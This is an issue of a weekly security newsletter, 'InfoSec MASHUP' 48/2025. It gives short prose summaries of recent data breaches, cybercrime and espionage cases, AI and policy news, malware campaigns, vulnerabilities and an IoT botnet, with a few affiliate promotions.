🕵🏻‍♂️ [InfoSec MASHUP] 48/2025

🔓 BREACHES & SECURITY INCIDENTS

🇯🇵 Canon says a recent Oracle E-Business Suite hack only hit a subsidiary’s web server. No Canon data has been leaked and services have been restored. The wider Cl0p/FIN11 campaign has named over 100 alleged victims across many industries.

→ Cox Confirms Oracle EBS Hack as Cybercriminals Name 100 Alleged Victims

→ Mazda Says No Data Leakage or Operational Impact From Oracle Hack

→ Dartmouth College confirms data breach after Clop extortion attack

🇫🇷 ⚽️ The French Football Federation said a cyberattack stole member data from its club management software. The breach used a compromised account and was stopped after detection; passwords were reset. The stolen data were personal details (names, gender, nationality, addresses) and the federation has filed a complaint.

🇯🇵 🍺 Japanese beer maker Asahi that suffered a ransomware attack in late September and exposed personal data of about 2 million people, is restoring systems in phases, investigating the breach, and warns recovery may take months — Stolen records include names, addresses, phone numbers, emails, birthdates, and gender for customers, employees, and family members, but no credit card data. Asahi.

🤖 OpenAI says some user data was exposed in a Mixpanel breach that Mixpanel detected on November 8. The leaked dataset included names, emails, approximate location, browser/OS, and organization or user IDs, but not ChatGPT content, passwords, API keys, payment data, or government IDs. OpenAI removed Mixpanel from production, is notifying affected users, and warns the data could be used for phishing.

🔑 Users of online code-formatting sites like JSONFormatter and CodeBeautify have exposed thousands of secrets, including keys, tokens, credentials, and PII. WatchTowr found these leaks by scraping saved JSON files and says attackers quickly harvest and use the exposed data. Many leaks come from people saving shareable links or pasting sensitive info into tools without sanitizing it.

📄 Gainsight says more customers were affected by suspicious activity tied to its Salesforce apps than first reported, though only a few had data exposed. Salesforce revoked affected app access and several vendors paused Gainsight integrations while investigations continue. The breach is linked to the ShinyHunters group and follows broader activity from a new RaaS called ShinySp1d3r.

🇺🇸 💰️ Comcast will pay a $1.5 million FCC fine after a vendor breach exposed about 274,000 customers' personal data. The breach occurred in February 2024 at debt collector FBCS, which notified Comcast months later and had millions affected overall. Comcast must improve vendor oversight, appoint a compliance officer, and file regular FCC reports, though it denies wrongdoing.

🇺🇸 🚨 Risk management firm Crisis24 said its OnSolve CodeRED emergency alert platform was hit by a cyberattack that disrupted alerts nationwide. The attackers stole user data, including names, addresses, emails, phone numbers, and clear-text passwords. The ransomware group INC Ransom claims responsibility and Crisis24 is rebuilding the system from an earlier backup.

🇺🇸 Hackers breached SitusAMC, a financial tech firm, on November 12 and stole corporate data, accounting records, and legal agreements. Major banks and lenders are hurriedly checking whether their customers’ information was exposed. The FBI is investigating while SitusAMC says the incident is contained and its systems are operational.

🇪🇸 ✈️ Spanish airline Iberia says a supplier was hacked and customers' names, emails, and frequent flyer numbers were stolen — No passwords or full credit card data were exposed, and Iberia added email-change verification and notified law enforcement. A hacker had claimed to post about 77 GB of Iberia data and tried to sell it for $150,000.

🇺🇸 Harvard reported a voice-phishing attack that accessed Alumni Affairs and Development systems. Personal contact and donor-related information for alumni, donors, some students, faculty, and staff may have been exposed. The university says no Social Security numbers, passwords, or payment data were in the compromised systems and is investigating with law enforcement and experts.

→ More breaches:

• 146,000 Impacted by Delta Dental of Virginia Data Breach

• Multiple London councils' IT systems disrupted by cyberattack

🔗 Partners and Affiliates

🔐 NordVPN Cyber-Monday Plan (Dec 1 - Dec 10)

With its user-friendly interface, robust security features, and commitment to privacy, NordVPN continues to be a popular choice for individuals seeking online protection and unrestricted internet access.

Special Offer: get up to 73% off with a 2-year plan!

🥷🏻 CYBERCRIME, CYBER ESPIONAGE, APT’s

🤝 Meet Rey — The cybercriminal group called Scattered LAPSUS$ Hunters (SLSH) has been stealing data and extorting major companies. The group’s technical operator and public face, “Rey”, was identified as 15-year-old Saif Al-Din Khader from Amman after security researchers traced operational mistakes. Saif says he is cooperating with law enforcement and wants to leave the group.

🇷🇺 🇺🇸 🇺🇦 The Russian-linked threat actors RomCom attacked a U.S. engineering firm because it worked with a U.S. city that is a sister city of a community in Ukraine — Cybersecurity firm Arctic Wolf said the attackers target groups with ties to Ukraine. The campaign shows Russia-aligned hackers are willing to hit private companies that support Ukrainian institutions.

🇺🇲 The FBI warns that cybercriminals posing as bank or support staff have stolen over $262 million in account takeover scams since January 2025. Attackers use phishing and impersonation to steal login credentials, then move funds to crypto wallets and lock out victims. The FBI urges strong passwords, MFA, careful links, and reporting incidents to banks and ic3.gov.

🗓️ {Cyber,Info}Sec Events: My list of past and future {cyber,info}sec related events — Feel free to contribute by submitting issues or pull requests (and don’t forget to star the project); Thanks! 😉

👨🏻‍⚖️ 👀 GOVERNMENT, POLITICS, AND PRIVACY

🇺🇸 👀 🇨🇳 The House Homeland Security Committee asked Anthropic CEO Dario Amodei to testify about a likely Chinese espionage campaign that used the Claude AI to target at least 30 organizations. Lawmakers called the incident a major national security concern and invited CEOs from Google Cloud and Quantum Xchange to the Dec. 17 hearing. They want to examine how AI, quantum tech, and cloud infrastructure enable new state-sponsored cyber threats and defenses.

🔗 Partners and Affiliates

🌐 Stay connected and secure on the go with Airalo's global eSIMs — Use the code NEWTOAIRALO15 if you’re new to Airalo to get an additional 15% discount.

🦠 MALWARE & THREATS

🪱 The self-replicating worm called Shai-Hulud has been injected into nearly 500 npm packages, exposing developer secrets across more than 26,000 GitHub repositories. The new variant is far more automated, using stolen npm tokens to rapidly spread and create public repos with stolen data. Security teams warn this boosts the risk of downstream supply-chain attacks and wider exploitation.

🔙 🚪 Attackers have been exploiting a recent WSUS vulnerability (CVE-2025-59287) to gain system-level access. They used PowerShell tools and Windows utilities to download and install the ShadowPad backdoor. ShadowPad then runs via DLL side-loading and loads plugins for persistence and stealth.

🤖 🧰 AI, CRYPTO, TECH & TOOLS

🧅 🛠️ Tor replaced its old tor1 relay encryption with a new Counter Galois Onion (CGO) design to fix several security flaws. CGO adds strong authentication, per-cell key updates for forward secrecy, and protections against tagging attacks. The change is experimental now and will roll out automatically to Tor Browser users when ready.

🇺🇸 🤖 A new bipartisan bill, the AI Fraud Deterrence Act, would raise fines and prison terms for fraud and impersonation using AI. Penalties could reach $1–2 million and 20–30 years for AI-assisted schemes, with up to $1 million and 3 years for impersonating officials. The bill responds to recent deepfake and AI-voice scams targeting officials and public figures.

🤑 Criminals are buying and sharing custom AI models on dark web forums to help with hacking tasks. These tools, like WormGPT and KawaiiGPT, make attacks easier by generating code, exploits, and phishing material. Experts warn this lowers the skill barrier and expands cybercrime.

🐛 🧠 VULNERABILITIES, RESEARCH, AND THREAT INTELLIGENCE

🫂 Researchers found a Teams guest feature can let attackers bypass Microsoft Defender protections when users join external tenants. Attackers can create unprotected tenants or use low‑cost licenses, send Microsoft‑originated invites, and deliver phishing or malware without triggering home org defenses. Organizations should restrict B2B guest settings, use cross‑tenant access controls, and train users to avoid unsolicited Teams invites.

🐛 🔓️ Five security flaws in the Fluent Bit log agent let attackers overwrite files, run code, spoof tags, corrupt logs, or bypass authentication. These bugs affect many cloud and container setups and could let attackers disrupt services or take over logging. Updating Fluent Bit to version 4.1.1 or 4.0.12+ fixes the issues.

🛰️ ICS, OT & IoT

🕸️ A new Mirai-based botnet called ShadowV2 targeted vulnerable D-Link, TP-Link, and other IoT devices using at least eight known flaws. Researchers saw the botnet active during the October AWS outage, likely as a brief test, and it spread globally to routers, NAS devices, and DVRs. ShadowV2 can run Mirai-style DDoS attacks, and vendors warn users to update or retire unsupported firmware.

💬 CONNECT

Follow me on Mastodon for quick daily updates and bite-sized content.

Prefer using an RSS feed? Add Infosec MASHUP to your feed here.

Enjoying our newsletter? Forward it to a colleague—
it’s one of the best ways to support us.

Thanks for reading today’s newsletter, and if you're enjoying it and want to support my work, you can buy me a coffee ☕ over at https://www.buymeacoffee.com/0x58

See you next time!

-X.